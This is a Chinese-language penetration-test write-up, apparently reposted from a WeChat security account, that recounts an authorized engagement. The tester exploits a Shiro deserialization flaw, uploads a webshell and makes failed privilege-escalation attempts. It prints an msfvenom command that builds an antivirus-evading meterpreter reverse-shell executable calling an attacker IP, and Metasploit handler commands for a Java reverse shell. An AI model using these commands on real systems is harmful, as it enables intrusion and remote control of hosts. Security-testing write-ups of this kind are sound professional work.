记一次授权单位的渗透测试过程

  • A+
所属分类:安全文章

前言

在某次对业主单位的渗透过程中,偶然发现某系统存在的一个shiro反序列化漏洞,于是开启了我的渗透提权之路。


渗透过程分享


01

漏洞发现及利用

故事的开始是这样

由于是授权单位,常规先丢进扫描器瞎一通乱扫。

哦哟,怎么有个红红的感叹号让我看看发现了什么大宝贝?

记一次授权单位的渗透测试过程

请输入标题     abcdefg

原来是我们的老朋友shiro反序列化漏洞,不多说,直接掏出exp就是干!

记一次授权单位的渗透测试过程

果然有东西,直接找个路径上传冰蝎马拿webshell

记一次授权单位的渗透测试过程

浏览器访问下,看来是上传成功了!

记一次授权单位的渗透测试过程

02

冰蝎给我连!

记一次授权单位的渗透测试过程

先看看权限,local service,比较低啊,看来得想办法提权,或者直接把管理员密码dump下来。

记一次授权单位的渗透测试过程

Systeminfo看了下,是2012R2的系统,默认是没办法直接从lsass.exe中读取到明文账户密码,只能读hash下来解密碰碰运气。

记一次授权单位的渗透测试过程

先生成个msf反弹个shell看看。

 

msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=x.x.x.x LPORT=7777 -e x86/shikata_ga_nai -i 15 -b 'x00' -f exe > 360.exe

 

payload 选择 windows/meterpreter/reverse_tcp,LHOST和LPORT分别填攻击机ip和MSF监听的端口,-e x86/shikata_ga_nai -i 15是用 x86/shikata_ga_nai 编码器编码15次以简单绕过av检测。

 

Msf开启监听,先上传到目标主机看看吧,当我要执行的时候,马子消失了。

记一次授权单位的渗透测试过程

大意了,看来是有杀软,看看进程,好家伙,还不止一个,360全家桶和安全狗套餐,得想办法免杀了。

记一次授权单位的渗透测试过程

免杀菜鸟哭唧唧,突然想起来冰蝎好像自带个反弹shell的功能,试用下。

记一次授权单位的渗透测试过程

Msf输入:

use exploit/multi/handler

set payload java/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 7777

exploit

反弹成功

记一次授权单位的渗透测试过程

getsystem,什么?没有这个命令?那我窃取令牌提权总可以吧,也没有?

Jsp的payload可把我难住了,这么多功能都没有拿啥提权。

记一次授权单位的渗透测试过程
记一次授权单位的渗透测试过程
记一次授权单位的渗透测试过程

把systeminfo贴下来,查看可用的提权exp,尝试了2012受影响的exp,均以失败告终

记一次授权单位的渗透测试过程
记一次授权单位的渗透测试过程

果然菜才是原罪。研究下免杀,下次再战,先把漏洞报告提交给客户吧!


声明

本公众号发表的原创文章,作为技术分享使用,均基于作者的主观判断,代表个人理解,并不保证一定正确,仅供大家参考。

Forest Team拥有该文章的修改和解释权。如欲引用、转载或传播此文章,必须包括版权声明等全部内容。未经Forest Team允许,不得任意修改或删减文章内容,不得以任何方式将其用于商业目的。


Forest Team


微信号|ForestTeam

记一次授权单位的渗透测试过程


本文始发于微信公众号(Forest Team):记一次授权单位的渗透测试过程

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: